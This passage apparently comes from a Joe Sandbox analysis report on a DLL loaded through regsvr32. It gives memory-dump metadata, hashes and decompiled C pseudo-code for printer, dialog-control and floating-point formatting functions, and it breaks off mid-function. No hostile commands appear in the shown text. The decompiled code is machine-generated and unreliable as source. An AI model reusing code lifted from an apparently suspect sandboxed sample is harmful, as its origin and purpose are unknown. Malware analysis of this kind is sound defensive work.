                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MetricsSystemlstrcmpi
                                                                                                            • String ID:
                                                                                                            • API String ID: 2335526769-0
                                                                                                            • Opcode ID: 1cbe2259d2c1a5909c7395cdd660f50db29ee15dbb1b64e3fa85e708783875df
                                                                                                            • Instruction ID: 2e24e30c7814501e8ef39cdb76116c26bdbe99ae311f6264528fd307033058d9
                                                                                                            • Opcode Fuzzy Hash: 1cbe2259d2c1a5909c7395cdd660f50db29ee15dbb1b64e3fa85e708783875df
                                                                                                            • Instruction Fuzzy Hash: BD21677150022D7ADB01EBB09C44FDEBBACEB453B2FA08661FC12D61C1D6718E818B64
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 93%
                                                                                                            			E1001F60C(void* __ecx, char* _a4) {
                                                                                                            				void* _v8;
                                                                                                            				void* _t15;
                                                                                                            				void* _t20;
                                                                                                            				void* _t35;
                                                                                                            
                                                                                                            				_push(__ecx);
                                                                                                            				_t35 = __ecx;
                                                                                                            				_t15 =  *(__ecx + 0x70);
                                                                                                            				if(_t15 != 0) {
                                                                                                            					_t15 = lstrcmpA(( *(GlobalLock(_t15) + 2) & 0x0000ffff) + _t16, _a4);
                                                                                                            					if(_t15 == 0) {
                                                                                                            						_t15 = OpenPrinterA(_a4,  &_v8, 0);
                                                                                                            						if(_t15 != 0) {
                                                                                                            							_t18 =  *(_t35 + 0x6c);
                                                                                                            							if( *(_t35 + 0x6c) != 0) {
                                                                                                            								E10029C1B(_t18);
                                                                                                            							}
                                                                                                            							_t20 = GlobalAlloc(0x42, DocumentPropertiesA(0, _v8, _a4, 0, 0, 0));
                                                                                                            							 *(_t35 + 0x6c) = _t20;
                                                                                                            							if(DocumentPropertiesA(0, _v8, _a4, GlobalLock(_t20), 0, 2) != 1) {
                                                                                                            								E10029C1B( *(_t35 + 0x6c));
                                                                                                            								 *(_t35 + 0x6c) = 0;
                                                                                                            							}
                                                                                                            							_t15 = ClosePrinter(_v8);
                                                                                                            						}
                                                                                                            					}
                                                                                                            				}
                                                                                                            				return _t15;
                                                                                                            			}








                                                                                                            APIs
                                                                                                            • GlobalLock.KERNEL32 ref: 1001F629
                                                                                                            • lstrcmpA.KERNEL32(?,?), ref: 1001F635
                                                                                                            • OpenPrinterA.WINSPOOL.DRV(?,?,00000000), ref: 1001F647
                                                                                                            • DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 1001F667
                                                                                                            • GlobalAlloc.KERNEL32(00000042,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 1001F66F
                                                                                                            • GlobalLock.KERNEL32 ref: 1001F679
                                                                                                            • DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000002), ref: 1001F686
                                                                                                            • ClosePrinter.WINSPOOL.DRV(?,00000000,?,?,00000000,00000000,00000002), ref: 1001F69E
                                                                                                              • Part of subcall function 10029C1B: GlobalFlags.KERNEL32(?), ref: 10029C25
                                                                                                              • Part of subcall function 10029C1B: GlobalUnlock.KERNEL32(?,00000000,?,1001F698,?,00000000,?,?,00000000,00000000,00000002), ref: 10029C36
                                                                                                              • Part of subcall function 10029C1B: GlobalFree.KERNEL32 ref: 10029C41
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Global$DocumentLockProperties$AllocCloseFlagsFreeOpenPrinterPrinter.Unlocklstrcmp
                                                                                                            • String ID:
                                                                                                            • API String ID: 168474834-0
                                                                                                            • Opcode ID: c3571f4809fef0992d903921779ddd8b1d2f29fd1f502d0743ce459bc184c30f
                                                                                                            • Instruction ID: 2a491371b327142203fc8723eb74c2771e75d1908c59da801caef355c7fd3301
                                                                                                            • Opcode Fuzzy Hash: c3571f4809fef0992d903921779ddd8b1d2f29fd1f502d0743ce459bc184c30f
                                                                                                            • Instruction Fuzzy Hash: 61118E76500208BEDB12DBAACC86D7F7AFDEF85784B50081DF645EA122D671ED80DB24
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 67%
                                                                                                            			E100074F2(void* __ebx, void* __edi, void* __esi) {
                                                                                                            				intOrPtr _t132;
                                                                                                            				int* _t133;
                                                                                                            				int _t138;
                                                                                                            				intOrPtr* _t139;
                                                                                                            				int _t142;
                                                                                                            				int* _t143;
                                                                                                            				int _t146;
                                                                                                            				int _t171;
                                                                                                            				intOrPtr _t172;
                                                                                                            				int _t173;
                                                                                                            				intOrPtr _t178;
                                                                                                            				int _t183;
                                                                                                            				int _t186;
                                                                                                            				void* _t187;
                                                                                                            				int* _t191;
                                                                                                            				void* _t213;
                                                                                                            				int* _t216;
                                                                                                            				short _t217;
                                                                                                            				intOrPtr* _t225;
                                                                                                            				void* _t227;
                                                                                                            				struct tagRECT _t228;
                                                                                                            				int* _t229;
                                                                                                            				signed int _t233;
                                                                                                            				int* _t235;
                                                                                                            				int* _t237;
                                                                                                            				int* _t238;
                                                                                                            				void* _t239;
                                                                                                            
                                                                                                            				_t227 = __esi;
                                                                                                            				E10011BF0(0x1003a548, _t239);
                                                                                                            				_t132 =  *0x1004c470; // 0xf3933a06
                                                                                                            				_t225 =  *((intOrPtr*)(_t239 + 0x14));
                                                                                                            				 *((intOrPtr*)(_t239 - 0x10)) = _t132;
                                                                                                            				_t183 = 0;
                                                                                                            				_t133 = _t225 + 0x12;
                                                                                                            				 *(_t239 - 0x34) = _t133;
                                                                                                            				if( *(_t239 + 0x10) != 0) {
                                                                                                            					 *((intOrPtr*)(_t239 - 0x58)) =  *((intOrPtr*)(_t225 + 8));
                                                                                                            					 *((intOrPtr*)(_t239 - 0x54)) =  *((intOrPtr*)(_t225 + 4));
                                                                                                            					 *((short*)(_t239 - 0x50)) =  *((intOrPtr*)(_t225 + 0xc));
                                                                                                            					 *((short*)(_t239 - 0x4e)) =  *((intOrPtr*)(_t225 + 0xe));
                                                                                                            					 *((short*)(_t239 - 0x4a)) =  *_t133;
                                                                                                            					_t216 = _t225 + 0x18;
                                                                                                            					 *((short*)(_t239 - 0x4c)) =  *(_t225 + 0x10);
                                                                                                            					 *((short*)(_t239 - 0x48)) =  *((intOrPtr*)(_t225 + 0x14));
                                                                                                            					_t225 = _t239 - 0x58;
                                                                                                            					 *(_t239 - 0x34) = _t216;
                                                                                                            				}
                                                                                                            				_t217 =  *((short*)(_t225 + 0xa));
                                                                                                            				_push(_t227);
                                                                                                            				_t228 =  *((short*)(_t225 + 8));
                                                                                                            				 *((intOrPtr*)(_t239 - 0x5c)) =  *((short*)(_t225 + 0xe)) + _t217;
                                                                                                            				 *(_t239 - 0x68) = _t228;
                                                                                                            				 *((intOrPtr*)(_t239 - 0x64)) = _t217;
                                                                                                            				 *((intOrPtr*)(_t239 - 0x60)) =  *((short*)(_t225 + 0xc)) + _t228;
                                                                                                            				_t138 = MapDialogRect( *( *((intOrPtr*)(_t239 + 8)) + 0x1c), _t239 - 0x68);
                                                                                                            				_t229 =  *(_t239 + 0x1c);
                                                                                                            				 *(_t239 - 0x28) = _t183;
                                                                                                            				if( *((intOrPtr*)(_t239 + 0x20)) >= 4) {
                                                                                                            					_t186 =  *_t229;
                                                                                                            					 *((intOrPtr*)(_t239 + 0x20)) =  *((intOrPtr*)(_t239 + 0x20)) - 4;
                                                                                                            					_t229 =  &(_t229[1]);
                                                                                                            					if(_t186 > 0) {
                                                                                                            						__imp__#4(_t229, _t186);
                                                                                                            						_t187 = _t186 + _t186;
                                                                                                            						_t229 = _t229 + _t187;
                                                                                                            						 *((intOrPtr*)(_t239 + 0x20)) =  *((intOrPtr*)(_t239 + 0x20)) - _t187;
                                                                                                            						 *(_t239 - 0x28) = _t138;
                                                                                                            					}
                                                                                                            					_t183 = 0;
                                                                                                            				}
                                                                                                            				 *(_t239 - 0x2c) = _t183;
                                                                                                            				_t139 = E100243B2();
                                                                                                            				_t218 =  *_t139;
                                                                                                            				 *((intOrPtr*)(_t239 + 0x14)) =  *((intOrPtr*)( *_t139 + 0xc))() + 0x10;
                                                                                                            				 *(_t239 - 4) = _t183;
                                                                                                            				 *(_t239 - 0x38) = _t183;
                                                                                                            				 *(_t239 - 0x3c) = _t183;
                                                                                                            				 *(_t239 - 0x30) = _t183;
                                                                                                            				if( *((short*)(_t239 + 0x18)) == 0x37a ||  *((short*)(_t239 + 0x18)) == 0x37b) {
                                                                                                            					_t142 =  *_t229;
                                                                                                            					_t49 = _t142 - 0xc; // -28
                                                                                                            					_t191 = _t49;
                                                                                                            					_t229 =  &(_t229[3]);
                                                                                                            					 *(_t239 - 0x40) = _t142;
                                                                                                            					 *(_t239 + 0x1c) = _t191;
                                                                                                            					if(_t191 > _t183) {
                                                                                                            						do {
                                                                                                            							_t171 =  *_t229;
                                                                                                            							 *(_t239 + 0x1c) =  *(_t239 + 0x1c) - 6;
                                                                                                            							_t235 =  &(_t229[1]);
                                                                                                            							_t229 =  &(_t235[0]);
                                                                                                            							 *(_t239 - 0x44) = _t171;
                                                                                                            							 *(_t239 + 0x10) =  *_t235;
                                                                                                            							if(_t171 != 0x80010001) {
                                                                                                            								_t172 = E1001F77E(0x1c);
                                                                                                            								 *((intOrPtr*)(_t239 - 0x6c)) = _t172;
                                                                                                            								__eflags = _t172 - _t183;
                                                                                                            								 *(_t239 - 4) = 1;
                                                                                                            								if(_t172 == _t183) {
                                                                                                            									_t173 = 0;
                                                                                                            									__eflags = 0;
                                                                                                            								} else {
                                                                                                            									_t173 = E1000B256(_t172,  *(_t239 - 0x2c),  *(_t239 - 0x44),  *(_t239 + 0x10));
                                                                                                            								}
                                                                                                            								 *(_t239 - 4) = 0;
                                                                                                            								 *(_t239 - 0x2c) = _t173;
                                                                                                            							} else {
                                                                                                            								_t237 =  &(_t229[1]);
                                                                                                            								 *(_t239 - 0x3c) =  *_t229;
                                                                                                            								_t238 =  &(_t237[3]);
                                                                                                            								 *(_t239 - 0x30) =  *_t237;
                                                                                                            								E10006AEC(_t239 + 0x14, _t238);
                                                                                                            								_t178 =  *((intOrPtr*)( *((intOrPtr*)(_t239 + 0x14)) - 0xc));
                                                                                                            								_t213 = 0xffffffef;
                                                                                                            								 *(_t239 + 0x1c) =  *(_t239 + 0x1c) + _t213 - _t178;
                                                                                                            								_t229 = _t238 + _t178 + 1;
                                                                                                            								 *(_t239 - 0x38) =  *(_t239 + 0x10);
                                                                                                            							}
                                                                                                            						} while ( *(_t239 + 0x1c) > _t183);
                                                                                                            						_t142 =  *(_t239 - 0x40);
                                                                                                            					}
                                                                                                            					 *((intOrPtr*)(_t239 + 0x20)) =  *((intOrPtr*)(_t239 + 0x20)) - _t142;
                                                                                                            					 *((intOrPtr*)(_t239 + 0x18)) =  *((intOrPtr*)(_t239 + 0x18)) + 0xfffc;
                                                                                                            				}
                                                                                                            				_t143 =  *(_t239 - 0x34);
                                                                                                            				_t256 =  *_t143 - 0x7b;
                                                                                                            				_push(_t239 - 0x20);
                                                                                                            				_push(_t143);
                                                                                                            				if( *_t143 != 0x7b) {
                                                                                                            					__imp__CLSIDFromProgID();
                                                                                                            				} else {
                                                                                                            					__imp__CLSIDFromString();
                                                                                                            				}
                                                                                                            				_push(_t183);
                                                                                                            				_push( *((intOrPtr*)(_t239 + 0x20)));
                                                                                                            				_push(_t229);
                                                                                                            				 *(_t239 + 0x1c) = _t143;
                                                                                                            				E1002EC6C(_t239 - 0x94, _t256);
                                                                                                            				 *(_t239 - 4) = 2;
                                                                                                            				 *(_t239 - 0x24) = _t183;
                                                                                                            				asm("sbb esi, esi");
                                                                                                            				_t233 =  ~( *((intOrPtr*)(_t239 + 0x18)) - 0x378) & _t239 - 0x00000094;
                                                                                                            				if( *(_t239 + 0x1c) >= _t183 && E100090DE( *((intOrPtr*)(_t239 + 8))) != 0 && E10009A9F( *((intOrPtr*)( *((intOrPtr*)(_t239 + 8)) + 0x48)), _t183, _t239 - 0x20, _t183,  *_t225, _t239 - 0x68,  *(_t225 + 0x10) & 0x0000ffff, _t233, 0 |  *((short*)(_t239 + 0x18)) == 0x00000377,  *(_t239 - 0x28), _t239 - 0x24) != 0) {
                                                                                                            					E1000A762( *(_t239 - 0x24), 1);
                                                                                                            					SetWindowPos( *( *(_t239 - 0x24) + 0x20),  *(_t239 + 0xc), _t183, _t183, _t183, _t183, 0x13);
                                                                                                            					 *( *(_t239 - 0x24) + 0x90) =  *(_t239 - 0x2c);
                                                                                                            					E100074A5(_t183,  *(_t239 - 0x24) + 0xa0, _t239, _t239 + 0x14);
                                                                                                            					 *((short*)( *(_t239 - 0x24) + 0x94)) =  *(_t239 - 0x38);
                                                                                                            					 *( *(_t239 - 0x24) + 0x98) =  *(_t239 - 0x3c);
                                                                                                            					 *( *(_t239 - 0x24) + 0x9c) =  *(_t239 - 0x30);
                                                                                                            				}
                                                                                                            				if( *(_t239 - 0x28) != _t183) {
                                                                                                            					__imp__#6( *(_t239 - 0x28));
                                                                                                            				}
                                                                                                            				_t146 =  *(_t239 - 0x24);
                                                                                                            				if(_t146 == _t183) {
                                                                                                            					 *( *(_t239 + 0x24)) = _t183;
                                                                                                            				} else {
                                                                                                            					 *( *(_t239 + 0x24)) =  *(_t146 + 0x20);
                                                                                                            					_t183 = 1;
                                                                                                            				}
                                                                                                            				 *(_t239 - 4) = 0;
                                                                                                            				E1002EFD7(_t183, _t239 - 0x94, _t218);
                                                                                                            				E100014B0( *((intOrPtr*)(_t239 + 0x14)) + 0xfffffff0, _t218);
                                                                                                            				 *[fs:0x0] =  *((intOrPtr*)(_t239 - 0xc));
                                                                                                            				return E100117AE(_t183,  *((intOrPtr*)(_t239 - 0x10)));
                                                                                                            			}


                                                                                                            APIs
                                                                                                            • __EH_prolog.LIBCMT ref: 100074F7
                                                                                                            • MapDialogRect.USER32(?,?), ref: 10007585
                                                                                                            • SysAllocStringLen.OLEAUT32(?,00000000), ref: 100075A6
                                                                                                            • CLSIDFromString.OLE32(?,00000004), ref: 100076A4
                                                                                                            • CLSIDFromProgID.OLE32(?,00000004), ref: 100076AC
                                                                                                            • SetWindowPos.USER32(00000004,?,00000000,00000000,00000000,00000000,00000013,00000001,00000000,00000004,00000000,?,?,?,0000FC84,00000000), ref: 10007748
                                                                                                            • SysFreeString.OLEAUT32(?), ref: 1000779B
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: String$From$AllocDialogFreeH_prologProgRectWindow
                                                                                                            • String ID:
                                                                                                            • API String ID: 493809305-0
                                                                                                            • Opcode ID: 49f95f9342accb2b989199e6a3fe790c04b9925ae12edf67e65d2fb5adebfaa9
                                                                                                            • Instruction ID: 430f13df2ed8550076e5f7c2e9f31eb497c55eb67174fe5e7936e43fbe5827de
                                                                                                            • Opcode Fuzzy Hash: 49f95f9342accb2b989199e6a3fe790c04b9925ae12edf67e65d2fb5adebfaa9
                                                                                                            • Instruction Fuzzy Hash: F5A12475D00619DFDB04CFA8C884AEDBBF4FF08344F118529E819AB251E735AE90CBA0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 73%
                                                                                                            			E1001BC3A(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8, signed int _a12, signed int _a16, signed int _a20, signed short* _a24) {
                                                                                                            				intOrPtr _v8;
                                                                                                            				char _v9;
                                                                                                            				signed int _v10;
                                                                                                            				signed int _v14;
                                                                                                            				signed int _v18;
                                                                                                            				signed short _v20;
                                                                                                            				char _v21;
                                                                                                            				char _v22;
                                                                                                            				char _v23;
                                                                                                            				char _v24;
                                                                                                            				char _v25;
                                                                                                            				char _v26;
                                                                                                            				char _v27;
                                                                                                            				char _v28;
                                                                                                            				char _v29;
                                                                                                            				char _v30;
                                                                                                            				char _v31;
                                                                                                            				char _v32;
                                                                                                            				char _v44;
                                                                                                            				signed int _v48;
                                                                                                            				signed short* _v52;
                                                                                                            				intOrPtr _t87;
                                                                                                            				signed int _t88;
                                                                                                            				signed short* _t99;
                                                                                                            				intOrPtr* _t100;
                                                                                                            				signed int _t101;
                                                                                                            				signed short _t103;
                                                                                                            				signed int _t105;
                                                                                                            				signed short* _t131;
                                                                                                            				signed int _t133;
                                                                                                            				signed int _t139;
                                                                                                            				signed short* _t141;
                                                                                                            				signed short _t149;
                                                                                                            				signed int _t151;
                                                                                                            				signed int _t152;
                                                                                                            				signed int _t159;
                                                                                                            				signed int _t161;
                                                                                                            				signed int _t164;
                                                                                                            				void* _t165;
                                                                                                            				void* _t166;
                                                                                                            
                                                                                                            				_t87 =  *0x1004c470; // 0xf3933a06
                                                                                                            				_v8 = _t87;
                                                                                                            				_t88 = _a12;
                                                                                                            				_t131 = _a24;
                                                                                                            				_t133 = _t88 & 0x00008000;
                                                                                                            				_v32 = 0xcc;
                                                                                                            				_v31 = 0xcc;
                                                                                                            				_v30 = 0xcc;
                                                                                                            				_v29 = 0xcc;
                                                                                                            				_v28 = 0xcc;
                                                                                                            				_v27 = 0xcc;
                                                                                                            				_v26 = 0xcc;
                                                                                                            				_v25 = 0xcc;
                                                                                                            				_v24 = 0xcc;
                                                                                                            				_v23 = 0xcc;
                                                                                                            				_v22 = 0xfb;
                                                                                                            				_v21 = 0x3f;
                                                                                                            				_v48 = 1;
                                                                                                            				_t149 = _t88 & 0x00007fff;
                                                                                                            				if(_t133 == 0) {
                                                                                                            					_t131[1] = 0x20;
                                                                                                            				} else {
                                                                                                            					_t131[1] = 0x2d;
                                                                                                            				}
                                                                                                            				_t151 = _a8;
                                                                                                            				if(_t149 != 0 || _t151 != 0 || _a4 != _t151) {
                                                                                                            					if(_t149 != 0x7fff) {
                                                                                                            						_t90 = _t149 & 0x0000ffff;
                                                                                                            						_v20 = _v20 & 0x00000000;
                                                                                                            						_v18 = _a4;
                                                                                                            						_t159 = (((_t149 & 0x0000ffff) >> 8) + (_t151 >> 0x18) * 2) * 0x4d + _t90 * 0x4d10 - 0x134312f4 >> 0x10;
                                                                                                            						_v10 = _t149;
                                                                                                            						_v14 = _t151;
                                                                                                            						E1001C383(_t131, _t151, _t159,  &_v20,  ~_t159, 1);
                                                                                                            						_t166 = _t165 + 0xc;
                                                                                                            						__eflags = _v10 - 0x3fff;
                                                                                                            						if(_v10 >= 0x3fff) {
                                                                                                            							_t159 = _t159 + 1;
                                                                                                            							__eflags = _t159;
                                                                                                            							E1001C151(_t131, _t151, _t159,  &_v20,  &_v32);
                                                                                                            						}
                                                                                                            						__eflags = _a20 & 0x00000001;
                                                                                                            						_t152 = _a16;
                                                                                                            						 *_t131 = _t159;
                                                                                                            						if((_a20 & 0x00000001) == 0) {
                                                                                                            							L27:
                                                                                                            							__eflags = _t152 - 0x15;
                                                                                                            							if(_t152 > 0x15) {
                                                                                                            								_t152 = 0x15;
                                                                                                            							}
                                                                                                            							_t161 = (_v10 & 0x0000ffff) - 0x3ffe;
                                                                                                            							_t52 =  &_v10;
                                                                                                            							 *_t52 = _v10 & 0x00000000;
                                                                                                            							__eflags =  *_t52;
                                                                                                            							_a12 = 8;
                                                                                                            							do {
                                                                                                            								E1001B6CD( &_v20);
                                                                                                            								_t56 =  &_a12;
                                                                                                            								 *_t56 = _a12 - 1;
                                                                                                            								__eflags =  *_t56;
                                                                                                            							} while ( *_t56 != 0);
                                                                                                            							__eflags = _t161;
                                                                                                            							if(_t161 < 0) {
                                                                                                            								_t164 =  ~_t161 & 0x000000ff;
                                                                                                            								__eflags = _t164;
                                                                                                            								if(_t164 > 0) {
                                                                                                            									do {
                                                                                                            										E1001B6FB( &_v20);
                                                                                                            										_t164 = _t164 - 1;
                                                                                                            										__eflags = _t164;
                                                                                                            									} while (_t164 != 0);
                                                                                                            								}
                                                                                                            							}
                                                                                                            							_t59 = _t152 + 1; // 0xcd
                                                                                                            							_t139 = _t59;
                                                                                                            							__eflags = _t139;
                                                                                                            							_t99 =  &(_t131[2]);
                                                                                                            							_v52 = _t99;
                                                                                                            							if(_t139 > 0) {
                                                                                                            								_a12 = _t139;
                                                                                                            								do {
                                                                                                            									asm("movsd");
                                                                                                            									asm("movsd");
                                                                                                            									asm("movsd");
                                                                                                            									E1001B6CD( &_v20);
                                                                                                            									E1001B6CD( &_v20);
                                                                                                            									E1001B66F(__eflags,  &_v20,  &_v44);
                                                                                                            									E1001B6CD( &_v20);
                                                                                                            									_t166 = _t166 + 0x14;
                                                                                                            									_v52 =  &(_v52[0]);
                                                                                                            									_t74 =  &_a12;
                                                                                                            									 *_t74 = _a12 - 1;
                                                                                                            									__eflags =  *_t74;
                                                                                                            									 *_v52 = _v9 + 0x30;
                                                                                                            									_v9 = 0;
                                                                                                            								} while ( *_t74 != 0);
                                                                                                            								_t99 = _v52;
                                                                                                            							}
                                                                                                            							_t100 = _t99 - 1;
                                                                                                            							_t101 = _t100 - 1;
                                                                                                            							__eflags =  *_t100 - 0x35;
                                                                                                            							_t141 =  &(_t131[2]);
                                                                                                            							if( *_t100 < 0x35) {
                                                                                                            								while(1) {
                                                                                                            									__eflags = _t101 - _t141;
                                                                                                            									if(_t101 < _t141) {
                                                                                                            										break;
                                                                                                            									}
                                                                                                            									__eflags =  *_t101 - 0x30;
                                                                                                            									if( *_t101 == 0x30) {
                                                                                                            										_t101 = _t101 - 1;
                                                                                                            										__eflags = _t101;
                                                                                                            										continue;
                                                                                                            									}
                                                                                                            									break;
                                                                                                            								}
                                                                                                            								__eflags = _t101 - _t141;
                                                                                                            								if(_t101 >= _t141) {
                                                                                                            									goto L46;
                                                                                                            								} else {
                                                                                                            									 *_t141 = 0x30;
                                                                                                            									goto L54;
                                                                                                            								}
                                                                                                            							} else {
                                                                                                            								while(1) {
                                                                                                            									__eflags = _t101 - _t141;
                                                                                                            									if(_t101 < _t141) {
                                                                                                            										break;
                                                                                                            									}
                                                                                                            									__eflags =  *_t101 - 0x39;
                                                                                                            									if( *_t101 == 0x39) {
                                                                                                            										 *_t101 = 0x30;
                                                                                                            										_t101 = _t101 - 1;
                                                                                                            										__eflags = _t101;
                                                                                                            										continue;
                                                                                                            									}
                                                                                                            									break;
                                                                                                            								}
                                                                                                            								__eflags = _t101 - _t141;
                                                                                                            								if(_t101 < _t141) {
                                                                                                            									_t101 = _t101 + 1;
                                                                                                            									 *_t131 =  *_t131 + 1;
                                                                                                            									__eflags =  *_t131;
                                                                                                            								}
                                                                                                            								 *_t101 =  *_t101 + 1;
                                                                                                            								__eflags =  *_t101;
                                                                                                            								L46:
                                                                                                            								_t103 = _t101 - _t131 - 3;
                                                                                                            								__eflags = _t103;
                                                                                                            								_t131[1] = _t103;
                                                                                                            								 *((char*)( &(_t131[2]) + _t103)) = 0;
                                                                                                            								goto L47;
                                                                                                            							}
                                                                                                            						} else {
                                                                                                            							_t152 = _t152 + _t159;
                                                                                                            							__eflags = _t152;
                                                                                                            							if(_t152 > 0) {
                                                                                                            								goto L27;
                                                                                                            							} else {
                                                                                                            								goto L26;
                                                                                                            							}
                                                                                                            						}
                                                                                                            					} else {
                                                                                                            						 *_t131 = 1;
                                                                                                            						if(_t151 != 0x80000000 || _a4 != 0) {
                                                                                                            							if((_t151 & 0x40000000) != 0) {
                                                                                                            								goto L11;
                                                                                                            							} else {
                                                                                                            								_push("1#SNAN");
                                                                                                            								goto L21;
                                                                                                            							}
                                                                                                            						} else {
                                                                                                            							L11:
                                                                                                            							__eflags = _t133;
                                                                                                            							if(_t133 == 0) {
                                                                                                            								L15:
                                                                                                            								__eflags = _t151 - 0x80000000;
                                                                                                            								if(_t151 != 0x80000000) {
                                                                                                            									goto L20;
                                                                                                            								} else {
                                                                                                            									__eflags = _a4;
                                                                                                            									if(_a4 != 0) {
                                                                                                            										goto L20;
                                                                                                            									} else {
                                                                                                            										_push("1#INF");
                                                                                                            										goto L18;
                                                                                                            									}
                                                                                                            								}
                                                                                                            							} else {
                                                                                                            								__eflags = _t151 - 0xc0000000;
                                                                                                            								if(_t151 != 0xc0000000) {
                                                                                                            									goto L15;
                                                                                                            								} else {
                                                                                                            									__eflags = _a4;
                                                                                                            									if(_a4 != 0) {
                                                                                                            										L20:
                                                                                                            										_push("1#QNAN");
                                                                                                            										L21:
                                                                                                            										_push( &(_t131[2]));
                                                                                                            										E10017B90();
                                                                                                            										_t131[1] = 6;
                                                                                                            									} else {
                                                                                                            										_push("1#IND");
                                                                                                            										L18:
                                                                                                            										_push( &(_t131[2]));
                                                                                                            										E10017B90();
                                                                                                            										_t131[1] = 5;
                                                                                                            									}
                                                                                                            								}
                                                                                                            							}
                                                                                                            						}
                                                                                                            						_v48 = _v48 & 0x00000000;
                                                                                                            						L47:
                                                                                                            						_t105 = _v48;
                                                                                                            					}
                                                                                                            				} else {
                                                                                                            					L26:
                                                                                                            					_t131[2] = 0x30;
                                                                                                            					L54:
                                                                                                            					 *_t131 =  *_t131 & 0x00000000;
                                                                                                            					_t131[1] = 0x20;
                                                                                                            					_t131[1] = 1;
                                                                                                            					_t131[2] = 0;
                                                                                                            					_t105 = 1;
                                                                                                            				}
                                                                                                            				return E100117AE(_t105, _v8);
                                                                                                            			}

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ___shr_12
                                                                                                            • String ID: 1#IND$1#INF$1#QNAN$1#SNAN$?
                                                                                                            • API String ID: 2664560246-4131533671
                                                                                                            • Opcode ID: 41872633d6340cc6f23dba41c7221c5f3b32f20f70e5c2c0d702b1f865941683
                                                                                                            • Instruction ID: 0f4b10661b4c6afdc81634f06d58437e80c3cbb5605fe3a4bfa1b348def2c0f3
                                                                                                            • Opcode Fuzzy Hash: 41872633d6340cc6f23dba41c7221c5f3b32f20f70e5c2c0d702b1f865941683
                                                                                                            • Instruction Fuzzy Hash: 47810232804A9ACECF01CB68C8847EEBBF4EF15354F0545AAE850DF282E774D685C3A1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 29%
                                                                                                            			E1002DA8D(intOrPtr __ecx, void* __edx) {
                                                                                                            				void* __esi;
                                                                                                            				void* __ebp;
                                                                                                            				intOrPtr _t60;
                                                                                                            				signed char _t65;
                                                                                                            				signed int _t70;
                                                                                                            				signed int _t71;
                                                                                                            				intOrPtr _t109;
                                                                                                            				signed int _t115;
                                                                                                            				signed int _t117;
                                                                                                            				void* _t133;
                                                                                                            				void* _t135;
                                                                                                            				intOrPtr _t140;
                                                                                                            				void* _t143;
                                                                                                            				void* _t145;
                                                                                                            
                                                                                                            				_t133 = __edx;
                                                                                                            				_t143 = _t145 - 0xa8;
